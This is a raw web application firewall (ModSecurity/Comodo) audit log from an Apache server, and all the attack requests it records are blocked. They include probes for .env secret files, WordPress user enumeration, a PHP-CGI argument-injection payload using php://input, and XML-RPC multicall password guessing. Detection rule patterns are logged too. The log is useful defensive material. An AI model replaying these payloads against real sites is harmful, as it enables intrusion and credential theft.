"CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748048211490901 2488 (- - -) Stopwatch2: 1748048211490901 2488; combined=1222, p1=406, p2=788, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e201672-Z-- --7f3d2b7b-A-- [24/May/2025:08:14:41 +0700] aDEdgTvI5DIWBJ2mFG7RBAAAAMc 103.236.140.4 50116 103.236.140.4 8181 --7f3d2b7b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --7f3d2b7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f3d2b7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748049281215122 845 (- - -) Stopwatch2: 1748049281215122 845; combined=388, p1=356, p2=0, p3=0, p4=0, p5=32, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f3d2b7b-Z-- --7df98158-A-- [24/May/2025:09:06:16 +0700] aDEpmPmzt4abyoi_U9lywwAAAIU 103.236.140.4 50518 103.236.140.4 8181 --7df98158-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 44.222.26.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 44.222.26.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7df98158-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7df98158-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748052376000038 3631 (- - -) Stopwatch2: 1748052376000038 3631; combined=1557, p1=572, p2=952, p3=0, p4=0, p5=32, sr=131, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7df98158-Z-- --86c34e3f-A-- [24/May/2025:09:24:13 +0700] aDEtzTvI5DIWBJ2mFG7RcgAAANQ 103.236.140.4 50636 103.236.140.4 8181 --86c34e3f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --86c34e3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86c34e3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748053453167304 868 (- - -) Stopwatch2: 1748053453167304 868; combined=354, p1=308, p2=0, p3=0, p4=0, p5=46, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86c34e3f-Z-- --bbf1970d-A-- [24/May/2025:09:37:21 +0700] aDEw4TvI5DIWBJ2mFG7Y4QAAANI 103.236.140.4 36706 103.236.140.4 8181 --bbf1970d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.230.62.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.230.62.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bbf1970d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbf1970d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748054241377032 2378 (- - -) Stopwatch2: 1748054241377032 2378; combined=1006, p1=370, p2=615, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbf1970d-Z-- --63da5939-A-- [24/May/2025:09:57:42 +0700] aDE1pjvI5DIWBJ2mFG7uZQAAAMw 103.236.140.4 48780 103.236.140.4 8181 --63da5939-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 92.55.190.215 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 92.55.190.215 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --63da5939-C-- --63da5939-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63da5939-E-- --63da5939-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748055462862791 4331 (- - -) Stopwatch2: 1748055462862791 4331; combined=3051, p1=391, p2=2628, p3=0, p4=0, p5=32, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63da5939-Z-- --d9f40627-A-- [24/May/2025:10:02:41 +0700] aDE20fmzt4abyoi_U9mTGwAAAIQ 103.236.140.4 58578 103.236.140.4 8181 --d9f40627-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.87.236.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.87.236.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9f40627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9f40627-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748055761475942 2300 (- - -) Stopwatch2: 1748055761475942 2300; combined=1049, p1=369, p2=656, p3=0, p4=0, p5=24, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9f40627-Z-- --ae9c4673-A-- [24/May/2025:10:31:24 +0700] aDE9jPmzt4abyoi_U9myOgAAAJQ 103.236.140.4 58004 103.236.140.4 8181 --ae9c4673-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.93.71 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.93.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ae9c4673-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae9c4673-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748057484153842 939 (- - -) Stopwatch2: 1748057484153842 939; combined=436, p1=389, p2=0, p3=0, p4=0, p5=47, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae9c4673-Z-- --f038130e-A-- [24/May/2025:10:47:05 +0700] aDFBOeunkxaVeh4NwhajZgAAAEs 103.236.140.4 60720 103.236.140.4 8181 --f038130e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.184.99.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.184.99.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f038130e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f038130e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748058425549045 2983 (- - -) Stopwatch2: 1748058425549045 2983; combined=1334, p1=487, p2=815, p3=0, p4=0, p5=32, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f038130e-Z-- --84d83b4c-A-- [24/May/2025:11:01:10 +0700] aDFEhuO2UzDOKMmK0i6ApAAAAAU 103.236.140.4 60208 103.236.140.4 8181 --84d83b4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.88.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.88.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --84d83b4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84d83b4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748059270353628 2557 (- - -) Stopwatch2: 1748059270353628 2557; combined=1251, p1=376, p2=843, p3=0, p4=0, p5=31, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84d83b4c-Z-- --fe706244-A-- [24/May/2025:11:03:27 +0700] aDFFD-unkxaVeh4Nwhaz7AAAAFA 103.236.140.4 36552 103.236.140.4 8181 --fe706244-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.81.24.227 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.81.24.227 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fe706244-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe706244-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748059407513638 983 (- - -) Stopwatch2: 1748059407513638 983; combined=386, p1=344, p2=0, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe706244-Z-- --0753dc32-A-- [24/May/2025:11:24:24 +0700] aDFJ-Pmzt4abyoi_U9nrtQAAAIs 103.236.140.4 53152 103.236.140.4 8181 --0753dc32-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.252.67.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.252.67.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0753dc32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0753dc32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748060664938483 3460 (- - -) Stopwatch2: 1748060664938483 3460; combined=1551, p1=485, p2=1015, p3=0, p4=0, p5=50, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0753dc32-Z-- --957dd677-A-- [24/May/2025:11:42:10 +0700] aDFOIuunkxaVeh4NwhbNOgAAAFU 103.236.140.4 35936 103.236.140.4 8181 --957dd677-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.181.166.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.181.166.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --957dd677-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --957dd677-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748061730669940 2987 (- - -) Stopwatch2: 1748061730669940 2987; combined=1425, p1=479, p2=913, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --957dd677-Z-- --b53ad81a-A-- [24/May/2025:11:42:39 +0700] aDFOP_mzt4abyoi_U9nxjQAAAIg 103.236.140.4 35984 103.236.140.4 8181 --b53ad81a-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b53ad81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b53ad81a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748061759478213 4130 (- - -) Stopwatch2: 1748061759478213 4130; combined=3627, p1=3504, p2=0, p3=0, p4=0, p5=123, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b53ad81a-Z-- --942c1f46-A-- [24/May/2025:11:49:00 +0700] aDFPvPmzt4abyoi_U9nxuAAAAJI 103.236.140.4 36150 103.236.140.4 8181 --942c1f46-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 84.247.188.52 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 84.247.188.52 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --942c1f46-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin$321 --942c1f46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --942c1f46-E-- --942c1f46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 84.247.188.52 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062140113633 6218 (- - -) Stopwatch2: 1748062140113633 6218; combined=4373, p1=536, p2=3663, p3=0, p4=0, p5=104, sr=109, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --942c1f46-Z-- --fbf9472e-A-- [24/May/2025:11:49:43 +0700] aDFP5_mzt4abyoi_U9nxvwAAAIs 103.236.140.4 36172 103.236.140.4 8181 --fbf9472e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fbf9472e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix!@# --fbf9472e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fbf9472e-E-- --fbf9472e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062183775835 5042 (- - -) Stopwatch2: 1748062183775835 5042; combined=3813, p1=407, p2=3238, p3=0, p4=0, p5=100, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fbf9472e-Z-- --7d614374-A-- [24/May/2025:11:53:53 +0700] aDFQ4fmzt4abyoi_U9nx1AAAAJQ 103.236.140.4 36232 103.236.140.4 8181 --7d614374-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7d614374-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin07 --7d614374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d614374-E-- --7d614374-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062433835206 5537 (- - -) Stopwatch2: 1748062433835206 5537; combined=3847, p1=477, p2=3180, p3=0, p4=0, p5=114, sr=86, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d614374-Z-- --9f28905c-A-- [24/May/2025:11:55:55 +0700] aDFRW-unkxaVeh4NwhbNSwAAAEA 103.236.140.4 36280 103.236.140.4 8181 --9f28905c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 122.117.102.125 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 122.117.102.125 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9f28905c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihin[_host_]-solihin --9f28905c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f28905c-E-- --9f28905c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 122.117.102.125 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748062555909773 4419 (- - -) Stopwatch2: 1748062555909773 4419; combined=3402, p1=393, p2=2880, p3=0, p4=0, p5=76, sr=66, sw=53, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
